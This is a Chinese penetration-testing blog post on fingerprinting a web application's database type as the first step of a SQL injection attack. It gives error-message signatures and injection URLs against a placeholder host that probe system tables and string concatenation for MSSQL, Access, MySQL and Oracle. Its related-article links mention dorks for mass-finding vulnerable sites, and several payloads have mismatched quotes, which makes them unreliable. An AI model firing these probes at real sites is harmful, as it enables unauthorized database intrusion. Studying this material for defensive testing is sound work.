当前位置:首页 > web渗透 > sql注入 > 正文内容

怎么判断数据库类型

4个月前 (11-08)850

sq6.jpg

想要成功的发动SQL注入攻击,最重要的是知道应用正在使用的数据库类型和版本。没有这一信息就不可能向查询注入信息并提取自己所感兴趣的数据,正所谓知己知彼百战百胜。
一:常见构架判断数据库类型

asp + access
asp + mssq|
asp.net + mssq|
php + mysq|
jsp + oracle
jsp+mysq|

二:利用一些特征判断数据库类型
报错信息:
Oracle:ORA-01756:括号内的字符串没有正确结束
Mysql: ERROR 1064 (42000): You have an error in yourSQL syntax; check the manual that corresponds to yourMySQL server version for the right syntax to use near
MSSQL: [Microsoft][ODBC SQL Server Driver][SQL Server]字符串’’之前有未闭合的引号

三:通过特有数据表进行判断

MSQQL数据库:

http://host/test.php?id=15 and (select count(*) from
sysobjects)>0 and 1=1

Access数据库:
http://host/test.php?id=15 and (select count(*) from
msysobjects)>0 and 1=1

Mysq|数据库:
http://host/test.php?id=15 and (select count(*) from
information_ schema. TABLES)>0 and 1=1

Oracle数据库:
http://host/test.php?id=15 and (select count(*) from
sys.user_ tables)>0 and 1=1

四:使用字符连接方式判断数据库类型

MSSQL数据库:
http://host/test.php?id=15 and“1'+'1'='11'

MySq|数据库:
http://host/test.php?id=15 and‘1'+'1'='11'
http://host/test.php?id=15 and CONCAT('1','1')='11'


Oracle数据库:
http://host/test.php?id=15 and 11'1'='11'
http://host/test.php?id=15 and CONCAT(1','1')='11'

扫描二维码推送至手机访问。

版权声明:本文由零零博客发布,如需转载请注明出处。

分享给朋友:

相关文章

sql注入简单测试

sql注入简单测试

最简单的测试http://localhost/test.php?id=15’ 返回错误http://localhost/test.php?id=15 and 1=1 返回...

什么是SQL盲注

什么是SQL盲注

盲注是指在无法使用详细数据库错消息或带内数据连接的情况下,利用数据库查询的输入审查漏洞从数据库提取信息或提取与数据库查询相关信息的攻击技术如果设计出了完整的查询(包括所有的相关的列及类型) ,带内数据...

sql注入是什么

sql注入是什么

sql注入是一种将sql代码插入或添加到应用的输入参数中的攻击,之后再将这些参数传递给后台的SQL服务器加以解析并执行。凡是构造SQL语句的步骤均存在被潜在攻击的风险,因为sql的多样性和构造时使用的...

常见的盲注环境

常见的盲注环境

提交一个导致SQL查询无效的利用是会返回一个通用错误页面,而提交正确的SQL时则返回一个内容可被适度控制的页面提交一个导致SQL查询无效的利用时会返回一个通用的错误页面,而提交正确的SQL时则会返回-...

实战|SQL漏洞实战挖掘技巧

实战|SQL漏洞实战挖掘技巧

信息收集这里先给大家推荐几个谷歌hack语法用来批量挖掘sql漏洞的。inurl:/search_results.php search=inurl:’Product.asp?BigClassNamei...